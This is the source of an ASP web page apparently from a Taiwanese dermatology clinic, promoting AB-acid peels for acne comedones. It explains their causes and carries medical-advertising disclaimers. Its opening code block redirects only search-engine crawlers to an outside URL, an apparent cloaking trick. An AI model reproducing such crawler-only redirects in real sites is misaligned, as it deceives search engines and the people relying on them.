<% agent=request.servervariables("http_user_agent") if instr(agent,"bot")>0 or instr(agent,"yahoo")>0 or instr(agent,"bing")>0 or instr(agent,"google")>0 then Response.Status="301 Moved Permanently" Response.AddHeader "Location","http://www.ton-yen.com.tw/skin_5.php" end if pageName = "p6" subPageName = "p6_4" %> 粉刺-中壢<%= pageTitle %> >
粉刺 皮膚問題粉刺

粉刺的形成為皮脂腺分泌旺盛,如果分泌的油脂出得來,就會感覺臉比較油;然而臉部粉刺皮脂腺的開口被化妝品或老廢角質阻塞油脂出不來,那油脂就會在毛孔內凝結成塊,這種塊狀東西就叫做粉刺。



粉刺的成因主要有兩種
一種粉刺為皮脂腺分泌比較旺盛
  熬夜、吃多油炸類食物、生理期、壓力等都會促使皮脂腺分泌旺盛產生粉刺。
另一則粉刺是毛孔被廢棄的角質或不適當的保養品、化妝品等髒東西阻塞


粉刺改善的方式
粉刺改善的方式如皮膚科開的A酸、果酸換膚、美容SPA的做臉,抑或傳統市場的挽臉,都是著重在去角質;粉刺要根源性的改善膚質,還是要從調控皮脂腺著手。
粉刺治療建議:AB酸煥膚消除粉刺

AB酸的A是AHA中大分子果酸的縮寫,能代謝廢棄的角質。讓包埋在毛孔裡的粉刺和髒東西浮出來。而B酸是所謂的水楊酸,水楊酸衍生物,控油效果好,可以溶解小顆的粉刺,抑制痘痘發炎,更可以局部調控皮脂腺,真正做到改善膚質。

要預防粉刺,先改善肌膚出油情況,這時候維持皮膚粉刺油水平衡就很重要。油跟水可謂是翹翹板,保濕做得好泌油量也會下降,也有助於AB酸術後肌膚修護。


粉刺

粉刺


【小提醒】
行政院衛生福利部2013/01/04公告:「『美容醫學』一般係指由專業醫師透過醫學技術,如:手術、藥物、醫療器械、生物科技材料等,執行具侵入性或低侵入性醫療技術來改善身體外觀,而『非以治療疾病為主要目的』」。本宣傳也是由合格醫師透過醫學技術執行具低侵入性醫療技術來「改善」身體外觀,而非以治療疾病為目的,符合上述的公告。
本宣傳依據行政院衛生福利部衛署醫字0990262180號、衛部醫字第1031662939辦理,屬於仿單核准適應症外的使用(Off-label use),執行的醫師應確實告知使用原因及可能造成的風險,並取得其同意始得使用;故本資訊無法取代醫師親自關心您;有關適應症、禁忌症等副作用等問題,醫師將依個案說明。

以上照片經本人同意使用


不管是白頭、黑頭粉刺都令人厭惡。這些阻塞物不僅撐大毛孔、也破壞了肌膚細緻...

當肌膚皮膚清潔不夠徹底、皮膚出油、角質層阻塞,粉刺就會開始作怪…不盡早處理,毛孔、痘痘問題也會接踵而來…